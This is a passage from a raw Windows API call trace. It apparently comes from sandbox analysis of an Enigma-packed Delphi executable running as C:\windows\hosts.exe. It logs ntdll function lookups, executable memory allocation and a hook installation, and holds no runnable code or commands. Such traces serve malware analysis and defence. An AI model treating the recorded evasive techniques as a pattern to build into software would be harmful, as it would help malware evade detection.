0x77a7ffac [0171.204] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFsControlFile") returned 0x77a7fde8 [0171.204] GetProcAddress (hModule=0x77a60000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77a80f48 [0171.204] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQuerySecurityObject") returned 0x77a81518 [0171.204] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetSecurityObject") returned 0x77a81b8c [0171.204] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetVolumeInformationFile") returned 0x77a81c8c [0171.205] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenKeyEx") returned 0x77a81008 [0171.205] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcess") returned 0x77a80804 [0171.205] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateProcessEx") returned 0x77a7ffdc [0171.205] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateUserProcess") returned 0x77a8090c [0171.205] GetProcAddress (hModule=0x77a60000, lpProcName="ZwResumeThread") returned 0x77a80058 [0171.205] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateThread") returned 0x77a7fff4 [0171.205] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationProcess") returned 0x77a7fac8 [0171.206] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryVirtualMemory") returned 0x77a7fbc8 [0171.206] GetProcAddress (hModule=0x77a60000, lpProcName="ZwDeviceIoControlFile") returned 0x77a7f8fc [0171.206] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0171.206] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0171.206] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationObject") returned 0x77a80154 [0171.206] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForMultipleObjects") returned 0x77a80138 [0171.207] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForSingleObject") returned 0x77a7f8ac [0171.207] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCopyFileChunk") returned 0x0 [0171.207] VirtualFree (lpAddress=0x310000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0171.207] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.207] GetProcAddress (hModule=0x77a60000, lpProcName="ZwProtectVirtualMemory") returned 0x77a80028 [0171.207] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.208] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0171.208] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.208] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0171.208] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.208] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0171.208] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.208] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0171.209] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.209] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0171.209] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.209] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0171.209] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3065203760312) returned 1 [0171.219] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x1) returned 0x320000 [0171.219] SysReAllocStringLen (in: pbstr=0x54bf5c*=0x0, psz="enigma_ide.dll", len=0xe | out: pbstr=0x54bf5c*="enigma_ide.dll") returned 1 [0171.220] GetDC (hWnd=0x0) returned 0x1f010b3c [0171.220] GetDeviceCaps (hdc=0x1f010b3c, index=90) returned 96 [0171.220] ReleaseDC (hWnd=0x0, hDC=0x1f010b3c) returned 1 [0171.220] GetDC (hWnd=0x0) returned 0x1f010b3c [0171.220] GetDeviceCaps (hdc=0x1f010b3c, index=104) returned 0 [0171.220] ReleaseDC (hWnd=0x0, hDC=0x1f010b3c) returned 1 [0171.220] CreatePalette (plpal=0x28fac0) returned 0xffffffff85080226 [0171.220] GetStockObject (i=7) returned 0x1b00017 [0171.221] GetStockObject (i=5) returned 0x1900015 [0171.221] GetStockObject (i=13) returned 0x18a002e [0171.221] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0171.221] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0171.222] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x75980000 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff26, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff25, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff24, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff23, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff22, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff21, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff20, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff3f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0171.222] LoadStringA (in: hInstance=0x42d000, uID=0xff3e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff3d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff3c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff3b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff3a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff39, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff38, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff37, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff36, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0171.223] LoadStringA (in: hInstance=0x42d000, uID=0xff35, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0171.224] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc112 [0171.224] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc1be [0171.224] GetCurrentThreadId () returned 0xa9c [0171.224] GlobalAddAtomA (lpString="EnigmaWndProcPtr0040000000000A9C") returned 0xc15d [0171.225] LoadStringA (in: hInstance=0x42d000, uID=0xfee1, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0171.225] LoadStringA (in: hInstance=0x42d000, uID=0xfee0, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0171.225] LoadStringA (in: hInstance=0x42d000, uID=0xfeff, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0171.225] LoadStringA (in: hInstance=0x42d000, uID=0xfefe, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0171.225] LoadStringA (in: hInstance=0x42d000, uID=0xfefd, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0171.250] LoadStringA (in: hInstance=0x42d000, uID=0xfefc, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0171.250] LoadStringA (in: hInstance=0x42d000, uID=0xfefb, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0171.250] LoadStringA (in: hInstance=0x42d000, uID=0xfefa, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0171.250] LoadStringA (in: hInstance=0x42d000, uID=0xfef9, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0171.250] LoadStringA (in: hInstance=0x42d000, uID=0xfef8, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0171.250] LoadStringA (in: hInstance=0x42d000, uID=0xfef7, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0171.250] LoadStringA (in: hInstance=0x42d000, uID=0xfef6, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xfef5, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xfef4, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xfef3, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xfef2, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xfef1, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xfef0, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xff0f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xff0e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xff0d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xff0c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xff0b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xff0a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xff09, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0171.251] LoadStringA (in: hInstance=0x42d000, uID=0xff08, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff07, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff06, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff05, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff04, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff03, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff02, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff01, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff00, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff1f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff1e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff1d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff1c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff1b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff1a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff19, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0171.252] LoadStringA (in: hInstance=0x42d000, uID=0xff18, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0171.253] LoadStringA (in: hInstance=0x42d000, uID=0xff17, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0171.253] LoadStringA (in: hInstance=0x42d000, uID=0xff16, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0171.253] LoadStringA (in: hInstance=0x42d000, uID=0xff15, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0171.253] LoadStringA (in: hInstance=0x42d000, uID=0xff14, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0171.253] LoadStringA (in: hInstance=0x42d000, uID=0xff13, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0171.253] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1bc [0171.253] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc076 [0171.255] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75410000 [0171.255] GetProcAddress (hModule=0x75410000, lpProcName="InitializeFlatSB") returned 0x7544266f [0171.255] GetProcAddress (hModule=0x75410000, lpProcName="UninitializeFlatSB") returned 0x75442542 [0171.255] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollProp") returned 0x75441d29 [0171.255] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollProp") returned 0x7544238d [0171.256] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_EnableScrollBar") returned 0x754420c9 [0171.256] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_ShowScrollBar") returned 0x75441fdb [0171.256] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollRange") returned 0x75441e8d [0171.256] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollInfo") returned 0x75441f0f [0171.256] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollPos") returned 0x75441ccd [0171.256] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollPos") returned 0x7544216d [0171.256] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollInfo") returned 0x754422be [0171.257] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollRange") returned 0x754421e2 [0171.267] GetModuleHandleA (lpModuleName="User32.dll") returned 0x75980000 [0171.267] GetProcAddress (hModule=0x75980000, lpProcName="SetLayeredWindowAttributes") returned 0x759bec88 [0171.268] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc075 [0171.268] GetVersion () returned 0x1db10106 [0171.268] GetCurrentProcessId () returned 0xb48 [0171.269] GlobalAddAtomA (lpString="EnigmaDelphi00000B48") returned 0xc15c [0171.270] GetCurrentThreadId () returned 0xa9c [0171.270] GlobalAddAtomA (lpString="EnigmaControlOfs0040000000000A9C") returned 0xc15b [0171.270] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000A9C") returned 0xc1dc [0171.270] GetProcAddress (hModule=0x75980000, lpProcName="GetMonitorInfoA") returned 0x759a4413 [0171.270] GetProcAddress (hModule=0x75980000, lpProcName="GetSystemMetrics") returned 0x75997d2f [0171.271] GetSystemMetrics (nIndex=19) returned 1 [0171.348] GetSystemMetrics (nIndex=75) returned 1 [0171.348] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x33e188c, fWinIni=0x0 | out: pvParam=0x33e188c) returned 1 [0171.349] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0171.349] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0171.349] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x0 [0171.349] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0171.349] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0171.350] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0171.350] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x0 [0171.350] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x0 [0171.350] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x0 [0171.350] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x0 [0171.350] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x0 [0171.362] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x0 [0171.362] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0171.362] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0171.362] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0171.362] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0171.362] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0171.362] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0171.363] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0171.363] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0171.363] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0171.363] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0171.363] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0171.363] GetDC (hWnd=0x0) returned 0xe010c53 [0171.363] GetDeviceCaps (hdc=0xe010c53, index=90) returned 96 [0171.363] ReleaseDC (hWnd=0x0, hDC=0xe010c53) returned 1 [0171.364] GetProcAddress (hModule=0x75980000, lpProcName="EnumDisplayMonitors") returned 0x759a451a [0171.364] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4bd66c, dwData=0x33e1ad8) returned 1 [0171.364] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x28fe27, fWinIni=0x0 | out: pvParam=0x28fe27) returned 1 [0171.365] CreateFontIndirectA (lplf=0x28fe27) returned 0x1c0a0c64 [0171.365] GetObjectA (in: h=0x1c0a0c64, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0171.365] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x28fcd3, fWinIni=0x0 | out: pvParam=0x28fcd3) returned 1 [0171.365] CreateFontIndirectA (lplf=0x28fdaf) returned 0x40a0c6a [0171.365] GetObjectA (in: h=0x40a0c6a, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0171.366] CreateFontIndirectA (lplf=0x28fd73) returned 0x40a0c6b [0171.375] GetObjectA (in: h=0x40a0c6b, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0171.376] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0171.376] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28fd87, nSize=0x100 | out: lpFilename="C:\\windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe")) returned 0x14 [0171.376] OemToCharA (in: pSrc="C:\\windows\\hosts.exe", pDst=0x28fd87 | out: pDst="C:\\windows\\hosts.exe") returned 1 [0171.377] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x330000 [0171.378] GetKeyboardLayoutList (in: nBuff=64, lpList=0x28fd08 | out: lpList=0x28fd08) returned 1 [0171.381] GetModuleHandleA (lpModuleName="USER32") returned 0x75980000 [0171.381] GetProcAddress (hModule=0x75980000, lpProcName="AnimateWindow") returned 0x759ab531 [0171.386] SysReAllocStringLen (in: pbstr=0x54d844*=0x0, psz="Help", len=0x4 | out: pbstr=0x54d844*="Help") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d840*=0x0, psz="YesToAll", len=0x8 | out: pbstr=0x54d840*="YesToAll") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d83c*=0x0, psz="NoToAll", len=0x7 | out: pbstr=0x54d83c*="NoToAll") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d838*=0x0, psz="All", len=0x3 | out: pbstr=0x54d838*="All") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d834*=0x0, psz="Ignore", len=0x6 | out: pbstr=0x54d834*="Ignore") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d830*=0x0, psz="Retry", len=0x5 | out: pbstr=0x54d830*="Retry") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d82c*=0x0, psz="Abort", len=0x5 | out: pbstr=0x54d82c*="Abort") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d828*=0x0, psz="Cancel", len=0x6 | out: pbstr=0x54d828*="Cancel") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d824*=0x0, psz="OK", len=0x2 | out: pbstr=0x54d824*="OK") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d820*=0x0, psz="No", len=0x2 | out: pbstr=0x54d820*="No") returned 1 [0171.386] SysReAllocStringLen (in: pbstr=0x54d81c*=0x0, psz="Yes", len=0x3 | out: pbstr=0x54d81c*="Yes") returned 1 [0171.386] GetTickCount () returned 0x1d11953 [0171.386] GetTickCount () returned 0x1d11953 [0171.387] GetCurrentThreadId () returned 0xa9c [0171.387] SetWindowsHookExW (idHook=3, lpfn=0x4e67b8, hmod=0x0, dwThreadId=0xa9c) returned 0x9036d [0171.387] RegisterClipboardFormatA (lpszFormat="TntUnicodeVcl.DestroyWindow") returned 0xc109 [0171.387] VirtualQuery (in: lpAddress=0x4ce37c, lpBuffer=0x28fe64, dwLength=0x1c | out: lpBuffer=0x28fe64*(BaseAddress=0x4ce000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6fc000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0171.388] GetCurrentProcessId () returned 0xb48 [0171.388] GetCurrentThreadId () returned 0xa9c [0171.388] GlobalAddAtomA (lpString="EnigmaDelphi00000B48") returned 0xc15c [0171.388] GlobalAddAtomA (lpString="EnigmaControlOfs0040000000000A9C") returned 0xc15b [0171.388] LoadCursorA (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0171.388] DestroyCursor (hCursor=0x0) returned 0 [0171.388] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3065221683366) returned 1 [0171.389] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xd0 [0171.389] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd4 [0171.389] GetLastError () returned 0x0 [0171.389] SetLastError (dwErrCode=0x0) [0171.389] GetLastError () returned 0x0 [0171.390] SetLastError (dwErrCode=0x0) [0171.390] GetLastError () returned 0x0 [0171.390] SetLastError (dwErrCode=0x0) [0171.390] GetLastError () returned 0x0 [0171.390] SetLastError (dwErrCode=0x0) [0171.390] GetLastError () returned 0x0 [0171.390] SetLastError (dwErrCode=0x0) [0171.390] GetLastError () returned 0x0 [0171.391] SetLastError (dwErrCode=0x0) [0171.391] GetLastError () returned 0x0 [0171.391] SetLastError (dwErrCode=0x0) [0171.391] GetLastError () returned 0x0 [0171.391] SetLastError (dwErrCode=0x0) [0171.391] GetLastError () returned 0x0 [0171.391] SetLastError (dwErrCode=0x0) [0171.391] GetLastError () returned 0x0 [0171.392] SetLastError (dwErrCode=0x0) [0171.392] GetLastError () returned 0x0 [0171.392] SetLastError (dwErrCode=0x0) [0171.392] GetLastError () returned 0x0 [0171.392] SetLastError (dwErrCode=0x0) [0171.393] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0171.393] GetLastError () returned 0x0 [0171.393] SetLastError (dwErrCode=0x0) [0171.393] GetLastError () returned 0x0 [0171.393] SetLastError (dwErrCode=0x0) [0171.393] GetLastError () returned 0x0 [0171.393] SetLastError (dwErrCode=0x0) [0171.393] GetLastError () returned 0x0 [0171.394] SetLastError (dwErrCode=0x0) [0171.394] GetLastError () returned 0x0 [0171.394] SetLastError (dwErrCode=0x0) [0171.394] GetLastError () returned 0x0 [0171.394] SetLastError (dwErrCode=0x0) [0171.394] GetLastError () returned 0x0 [0171.394] SetLastError (dwErrCode=0x0) [0171.394] GetLastError () returned 0x0 [0171.395] SetLastError (dwErrCode=0x0) [0171.395] GetLastError () returned 0x0 [0171.395] SetLastError (dwErrCode=0x0) [0171.395] GetLastError () returned 0x0 [0171.395] SetLastError (dwErrCode=0x0) [0171.395] GetLastError () returned 0x0 [0171.395] SetLastError (dwErrCode=0x0) [0171.395] GetLastError () returned 0x0 [0171.396] SetLastError (dwErrCode=0x0) [0171.396] GetLastError () returned 0x0 [0171.396] SetLastError (dwErrCode=0x0) [0171.396] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x340000 [0171.396] GetLastError () returned 0x0 [0171.396] SetLastError (dwErrCode=0x0) [0171.397] GetLastError () returned 0x0 [0171.397] SetLastError (dwErrCode=0x0) [0171.397] GetLastError () returned 0x0 [0171.397] SetLastError (dwErrCode=0x0) [0171.405] GetLastError () returned 0x0 [0171.405] SetLastError (dwErrCode=0x0) [0171.405] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0171.406] GetLastError () returned 0x0 [0171.406] SetLastError (dwErrCode=0x0) [0171.406] GetLastError () returned 0x0 [0171.406] SetLastError (dwErrCode=0x0) [0171.406] GetLastError () returned 0x0 [0171.406] SetLastError (dwErrCode=0x0) [0171.406] GetLastError () returned 0x0 [0171.407] SetLastError (dwErrCode=0x0) [0171.407] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0171.407] GetLastError () returned 0x0 [0171.407] SetLastError (dwErrCode=0x0) [0171.407] GetLastError () returned 0x0 [0171.408] SetLastError (dwErrCode=0x0) [0171.408] GetLastError () returned 0x0 [0171.408] SetLastError (dwErrCode=0x0) [0171.408] GetLastError () returned 0x0 [0171.408] SetLastError (dwErrCode=0x0) [0171.408] GetLastError () returned 0x0 [0171.409] SetLastError (dwErrCode=0x0) [0171.409] GetLastError () returned 0x0 [0171.409] SetLastError (dwErrCode=0x0) [0171.409] GetLastError () returned 0x0 [0171.409] SetLastError (dwErrCode=0x0) [0171.409] GetLastError () returned 0x0 [0171.409] SetLastError (dwErrCode=0x0) [0171.409] GetLastError () returned 0x0 [0171.410] SetLastError (dwErrCode=0x0) [0171.410] GetLastError () returned 0x0 [0171.410] SetLastError (dwErrCode=0x0) [0171.410] GetLastError () returned 0x0 [0171.410] SetLastError (dwErrCode=0x0) [0171.410] GetLastError () returned 0x0 [0171.410] SetLastError 